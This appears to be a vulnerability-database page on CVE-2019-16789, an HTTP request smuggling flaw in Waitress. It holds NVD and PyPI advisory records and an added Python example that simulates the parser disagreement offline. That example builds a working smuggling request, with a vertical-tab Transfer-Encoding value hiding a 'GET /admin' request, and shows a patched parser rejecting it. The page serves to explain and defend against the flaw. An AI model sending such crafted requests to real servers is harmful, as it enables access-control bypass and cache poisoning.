"1.4.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:1.10.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { 
"cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:redhat:openstack:15:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] }, "cve": { "CVE_data_meta": { "ASSIGNER": "security-advisories@github.com", "ID": "CVE-2019-16789" }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "en", "value": "In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation." 
} ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "en", "value": "CWE-444" } ] } ] }, "references": { "reference_data": [ { "name": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017", "refsource": "MISC", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017" }, { "name": "https://github.com/github/advisory-review/pull/14604", "refsource": "CONFIRM", "tags": [ "Broken Link", "Third Party Advisory" ], "url": "https://github.com/github/advisory-review/pull/14604" }, { "name": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes", "refsource": "MISC", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes" }, { "name": "FEDORA-2020-bdcc8ffc24", "refsource": "FEDORA", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/" }, { "name": "FEDORA-2020-65a7744e38", "refsource": "FEDORA", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/" }, { "name": "RHSA-2020:0720", "refsource": "REDHAT", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0720" }, { "name": "https://www.oracle.com/security-alerts/cpuapr2022.html", "refsource": "MISC", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "name": "[debian-lts-announce] 20220512 [SECURITY] [DLA 3000-1] waitress security update", "refsource": "MLIST", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html" } ] } }, "impact": { "baseMetricV2": { 
"acInsufInfo": false, "cvssV2": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false }, "baseMetricV3": { "cvssV3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 4.2 } }, "lastModifiedDate": "2022-09-23T18:58Z", "publishedDate": "2019-12-26T17:15Z" } } }
pysec-2019-138
Vulnerability from pysec
In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation.
{ "affected": [ { "package": { "ecosystem": "PyPI", "name": "waitress", "purl": "pkg:pypi/waitress" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "11d9e138125ad46e951027184b13242a3c1de017" } ], "repo": "https://github.com/Pylons/waitress", "type": "GIT" }, { "events": [ { "introduced": "0" }, { "fixed": "1.4.1" } ], "type": "ECOSYSTEM" } ], "versions": [ "0.1", "0.2", "0.3", "0.4", "0.5", "0.6", "0.6.1", "0.7", "0.8", "0.8.1", "0.8.2", "0.8.3", "0.8.4", "0.8.5", "0.8.6", "0.8.7", "0.8.8", "0.8.9", "0.8.10", "0.8.11b0", "0.9.0b0", "0.9.0b1", "0.9.0", "1.0a1", "1.0a2", "1.0.0", "1.0.1", "1.0.2", "1.1.0", "1.2.0b1", "1.2.0b2", "1.2.0b3", "1.2.0", "1.2.1", "1.3.0b0", "1.3.0", "1.3.1", "1.4.0" ] } ], "aliases": [ "CVE-2019-16789", "GHSA-968f-66r5-5v74" ], "details": "In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. 
This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation.", "id": "PYSEC-2019-138", "modified": "2020-02-25T17:15:00Z", "published": "2019-12-26T17:15:00Z", "references": [ { "type": "FIX", "url": "https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017" }, { "type": "ADVISORY", "url": "https://github.com/github/advisory-review/pull/14604" }, { "type": "WEB", "url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/" }, { "type": "ADVISORY", "url": "https://access.redhat.com/errata/RHSA-2020:0720" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-968f-66r5-5v74" } ] }
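The parser disagreement described above, and the work_around note in the CVE record (an RFC 7230-compliant front-end drops such a request with 400 Bad Request), can be reproduced offline. The following is an added illustration written for this page, not Waitress code. Three header-parsing policies are assumed: "lenient" models the pre-1.4.1 behaviour the advisory describes, where any ASCII whitespace is stripped from a field value (Python's bytes.strip() removes vertical tab and form feed as well as SP and HTAB); "ignore" is a hypothetical front-end that discards a header whose value contains invalid characters and therefore frames the body by Content-Length; "reject" is RFC 7230 behaviour (400 Bad Request), which is what Waitress 1.4.1 and later do. The request bytes, hostname and paths are constructed for the example.

```python
"""Parser disagreement behind CVE-2019-16789, modelled in plain Python.

Added example for this page; not Waitress code. The three policies below are
assumptions about front-end / back-end behaviour, labelled in parse_headers().
"""
import re

# RFC 7230: field-value is VCHAR / obs-text with SP / HTAB between; OWS is
# only SP / HTAB. Anything else (VT, FF, other controls) is not a valid value.
VALID_FIELD_VALUE = re.compile(rb"\A[\t\x20-\x7e\x80-\xff]*\Z")


class BadRequest(Exception):
    """Where a compliant parser answers 400 Bad Request and closes the connection."""


def parse_headers(block: bytes, mode: str) -> dict:
    """Parse 'Name: value' lines under one of three assumed policies:
    'lenient' - strip any ASCII whitespace (bytes.strip()), the pre-1.4.1
                behaviour the advisory describes; "\\x0bchunked" -> "chunked"
    'ignore'  - hypothetical front-end that drops a header whose value has
                invalid characters and so falls back to Content-Length
    'reject'  - RFC 7230: invalid characters -> 400 (Waitress >= 1.4.1)
    """
    headers = {}
    for line in block.split(b"\r\n"):
        if not line:
            continue
        name, sep, value = line.partition(b":")
        if not sep or not name:
            raise BadRequest("malformed header line")
        name = name.strip(b" \t").lower()
        if mode == "lenient":
            headers[name] = value.strip()          # also removes \x0b and \x0c
        elif VALID_FIELD_VALUE.match(value):
            headers[name] = value.strip(b" \t")    # OWS only
        elif mode == "reject":
            raise BadRequest("invalid characters in header field value")
        # mode == "ignore": header silently discarded
    return headers


def frame_body(headers: dict, data: bytes):
    """Return (body, leftover). leftover is what this parser would read as the
    start of the *next* request on the same connection."""
    te = headers.get(b"transfer-encoding")
    if te is not None and te.lower() == b"chunked":
        body, pos = b"", 0
        while True:
            eol = data.index(b"\r\n", pos)
            size = int(data[pos:eol].split(b";")[0], 16)   # ignore chunk-ext
            pos = eol + 2
            if size == 0:
                end = data.index(b"\r\n", pos) + 2          # empty trailer section
                return body, data[end:]
            body += data[pos:pos + size]
            pos += size + 2                                  # chunk data + CRLF
    length = int(headers.get(b"content-length", b"0"))
    return data[:length], data[length:]


def parse_request(raw: bytes, mode: str):
    head, _, data = raw.partition(b"\r\n\r\n")
    request_line, _, header_block = head.partition(b"\r\n")
    body, leftover = frame_body(parse_headers(header_block, mode), data)
    return request_line, body, leftover


def smuggled_bytes(raw: bytes, front_mode: str, back_mode: str) -> bytes:
    """Bytes the back-end treats as a second request although the front-end
    saw (and applied its access checks to) only one. The front-end is assumed
    to forward the request bytes unchanged."""
    _, _, front_left = parse_request(raw, front_mode)
    _, _, back_left = parse_request(raw, back_mode)
    return back_left if front_left == b"" else b""


# Constructed attack request. Content-Length covers the terminating chunk AND
# the smuggled request, so a Content-Length-framed front-end forwards it all
# as one body; a chunked-framed back-end stops at "0\r\n\r\n".
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: app.internal\r\n\r\n"
CHUNK_END = b"0\r\n\r\n"
ATTACK = b"".join([
    b"POST /upload HTTP/1.1\r\n",
    b"Host: app.internal\r\n",
    b"Content-Length: %d\r\n" % len(CHUNK_END + SMUGGLED),
    b"Transfer-Encoding: \x0bchunked\r\n",   # VT (0x0B) is not OWS
    b"\r\n",
    CHUNK_END,
    SMUGGLED,
])

if __name__ == "__main__":
    print(smuggled_bytes(ATTACK, "ignore", "lenient"))   # the GET /admin request
    try:
        smuggled_bytes(ATTACK, "ignore", "reject")        # patched back-end
    except BadRequest as exc:
        print("back-end rejected:", exc)
```

Run as a script, the ignore/lenient pair yields the smuggled GET /admin request as leftover bytes on the back-end connection (the request the front-end never saw), while the ignore/reject pair raises BadRequest. The practical check against a deployment is the same: a Transfer-Encoding value containing 0x0B or 0x0C must draw a 400 and a closed connection from the back-end (Waitress 1.4.1 and later), and the front-end should do the same rather than silently discarding the header and falling back to Content-Length.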
Sightings
| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.